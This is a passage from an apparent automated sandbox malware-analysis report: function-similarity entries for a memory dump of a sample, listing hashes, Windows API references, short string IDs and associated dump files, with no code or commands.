                                                                                    • Instruction Fuzzy Hash: 3CA1B5B1A003299BEB75DF99C8D0BEEB7F1AB64304F0440F9D98967241CB74AE84CB51
                                                                                    APIs
                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 01075E34
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorHandling__start
                                                                                    • String ID: pow
                                                                                    • API String ID: 3213639722-2276729525
                                                                                    • Opcode ID: cd07c92ba046d15598770f3d441a1e22c09a93af9f14dfb1665ad9b1f8bb6d6d
                                                                                    • Instruction ID: 742c664bdc166f706134076c5ea2c513250dee88769a9d9f5d0fd31e021b475a
                                                                                    • Opcode Fuzzy Hash: cd07c92ba046d15598770f3d441a1e22c09a93af9f14dfb1665ad9b1f8bb6d6d
                                                                                    • Instruction Fuzzy Hash: 1B515971E0820696DB66771CDD013FE3BD4EB00710F10CD98E0E686299EA3988D58B8E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0$Flst
                                                                                    • API String ID: 0-758220159
                                                                                    • Opcode ID: a232495a8bfcacad2469999957d02f2217b72b4ec9e743f70e70ea2bab36c271
                                                                                    • Instruction ID: e1954523fca10ee7161ecb4b6f59706f1ccd1fcb667cb17d3509b7af3678c8cd
                                                                                    • Opcode Fuzzy Hash: a232495a8bfcacad2469999957d02f2217b72b4ec9e743f70e70ea2bab36c271
                                                                                    • Instruction Fuzzy Hash: 0C517AB1E002189FDF66EFA9C4846ADFBF8FF54714F5480AAD089DB251E7709985CB80
                                                                                    APIs
                                                                                    • RtlDebugPrintTimes.NTDLL ref: 0105D959
                                                                                      • Part of subcall function 01034859: RtlDebugPrintTimes.NTDLL ref: 010348F7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $$$
                                                                                    • API String ID: 3446177414-233714265
                                                                                    • Opcode ID: 16493aaa3c6615e3d3fa829d3f086cce610cfcd3a2350f0a0f73a936071f68ab
                                                                                    • Instruction ID: f551544c47d8a35f94558d0805d7afbec9e1ce78183daac1cee3b605b7d687b6
                                                                                    • Opcode Fuzzy Hash: 16493aaa3c6615e3d3fa829d3f086cce610cfcd3a2350f0a0f73a936071f68ab
                                                                                    • Instruction Fuzzy Hash: D151F771A0034ADFDBA4DFE8C4847EEBBF2BF44314F1441AAD8956B285D7749891CB80
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $
                                                                                    • API String ID: 3446177414-3993045852
                                                                                    • Opcode ID: 79b3330e71c218f4e5dcc193da8015e8a6963b6a806d27edeaef947813946e2e
                                                                                    • Instruction ID: c202b29b94f837df0509da63c1fbaeb627f3848508d8480756d64e05f0b94dcb
                                                                                    • Opcode Fuzzy Hash: 79b3330e71c218f4e5dcc193da8015e8a6963b6a806d27edeaef947813946e2e
                                                                                    • Instruction Fuzzy Hash: D141BF75A0020AABDF22DF99C880AEEBBF5FF48704F540169EE94A7302C7719D51CB90
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: 0$0
                                                                                    • API String ID: 3446177414-203156872
                                                                                    • Opcode ID: e918883121a679bcf0c318746239e3ee21029b0842da92d216f5af68373c3c82
                                                                                    • Instruction ID: 065773f46ad96c24c0bfa0ba32277eb6315e317693e83b598bc5ab9b4a69cc5b
                                                                                    • Opcode Fuzzy Hash: e918883121a679bcf0c318746239e3ee21029b0842da92d216f5af68373c3c82
                                                                                    • Instruction Fuzzy Hash: C6418BB16087569FC350CF28C484A5ABBE4BB88314F044A6EF9C8DB341D731EA45CB96